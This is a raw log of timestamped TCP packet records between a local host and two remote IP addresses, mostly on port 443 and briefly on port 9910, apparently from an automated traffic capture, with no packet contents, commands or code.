Jan 15, 2025 11:38:11.017823935 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.017860889 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.017870903 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.017909050 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.017925978 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.018070936 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.018115044 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.018146038 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.018156052 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.018193007 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.018214941 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.018353939 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.018394947 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.018429995 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.018439054 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.018475056 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.018502951 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.018626928 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.018675089 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.018702984 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.018712997 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.018743992 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.018786907 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.093202114 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.093267918 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.093319893 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.093355894 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.093380928 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.093405008 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.101375103 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.101439953 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.101475954 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.101519108 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.101532936 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.101592064 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.109677076 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.109725952 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.109767914 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.109782934 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.109821081 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.109844923 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.110003948 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.110044956 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.110075951 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.110086918 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.110122919 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.110157967 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.110291958 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.110332012 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.110359907 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.110369921 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.110413074 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.110434055 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.110588074 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.110630035 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.110668898 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.110677958 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.110709906 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.110747099 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.110903025 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.110964060 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.111000061 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.111010075 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.111043930 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.111068010 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.111196995 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.111248970 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.111275911 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.111285925 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.111371994 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.111371994 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.185822010 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.185892105 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.185942888 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.185972929 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.186002016 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.186019897 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.194138050 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.194242001 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.194274902 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.194302082 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.194339037 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.194363117 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.202508926 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.202585936 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.202630997 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.202662945 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.202697992 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.202718019 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.202894926 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.202944040 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.202975035 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.202986002 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.203022003 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.203046083 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.203377962 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.203419924 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.203459024 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.203469992 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.203502893 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.203528881 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.203753948 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.203797102 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.203834057 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.203844070 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.203874111 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.203905106 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.205707073 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.205773115 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.205812931 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.205848932 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.205874920 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.205904961 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.206011057 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.206056118 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.206083059 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.206094027 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.206124067 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.206145048 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.278599977 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.278662920 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.278703928 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.278736115 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.278765917 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.278784037 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.286415100 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.286487103 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.286544085 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.286581039 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.286609888 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.286634922 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.294872046 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.294933081 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.294996023 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.295032024 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.295058966 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.295090914 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.295239925 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.295284986 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.295360088 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.295361042 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.295376062 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.295444012 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.296080112 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.296130896 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.296180964 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.296191931 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.296241999 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.296242952 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.296569109 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.296629906 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.296699047 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.296715021 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.296744108 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.296775103 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.297745943 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.297791958 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.297833920 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.297844887 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.297883034 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.297900915 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.298069000 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.298120975 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.298161030 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.298171043 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.298204899 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.298224926 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.371741056 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.371803045 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.371864080 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.371932983 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.371975899 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.372004032 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.379256964 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.379348993 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.379362106 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.379391909 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.379606962 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.379606962 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.387723923 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.387792110 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.387852907 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.387919903 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.387964010 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.387981892 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.387984991 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.388012886 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.388062000 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.388068914 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.388092995 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.388108015 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.388158083 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.388194084 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.388623953 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.388668060 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.388720989 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.388732910 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.388761044 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.388787985 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.388928890 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.388976097 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.389024973 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.389036894 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.389064074 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.389086008 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.390522957 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.390583992 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.390635014 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.390645981 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.390675068 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.390710115 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.390767097 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.390811920 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.390855074 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.390866041 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.390897036 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.390917063 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.463718891 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.463742971 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.463816881 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.463845968 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.463900089 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.471379995 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.471405029 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.471476078 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.471541882 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.471585035 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.471611023 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.480415106 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.480433941 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.480587006 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.480618954 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.480873108 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.480945110 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.480957031 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.481065035 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.481096983 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.481153965 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.481517076 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.481535912 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.481604099 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.481617928 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.481678963 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.481914997 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.481926918 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.481977940 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.482031107 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.482043028 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.482101917 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.482721090 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.482732058 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.482850075 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.482862949 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.482928038 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.483231068 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.483242989 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.483351946 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.483364105 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.483434916 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.556237936 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.556301117 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.556353092 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.556422949 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.556459904 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.556484938 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.564244986 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.564311981 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.564378023 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.564378977 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.564440012 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.564502954 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.573110104 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.573177099 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.573333025 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.573333025 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.573391914 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.573452950 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.573456049 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.573479891 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.573540926 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.573540926 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.573561907 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.573589087 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.573623896 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.573647022 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.574151993 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.574178934 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.574376106 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.574376106 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.574408054 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.574466944 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.574508905 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.574522018 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.574594021 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.574604988 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.574654102 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.575398922 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.575445890 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.575473070 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.575486898 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.575519085 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.575539112 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.575891018 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.575937033 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.575963974 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.575974941 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.576001883 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.576019049 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.576041937 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.576190948 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.576246023 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.602428913 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:34.333354950 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:34.338316917 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:34.338648081 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:34.351273060 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:34.356502056 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:34.356744051 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:34.361761093 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:34.993849993 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:34.993922949 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:34.993964911 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:34.994004011 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:34.994039059 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:34.994072914 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:34.994107962 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:34.994126081 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:34.994127035 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:34.994127035 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:34.994143963 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:34.994178057 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:34.994215012 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:34.994229078 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:34.994285107 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.081599951 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.081645012 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.081718922 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.087403059 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.087457895 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.087496996 CET	9910	49737	194.226.169.227	192.168.2.4
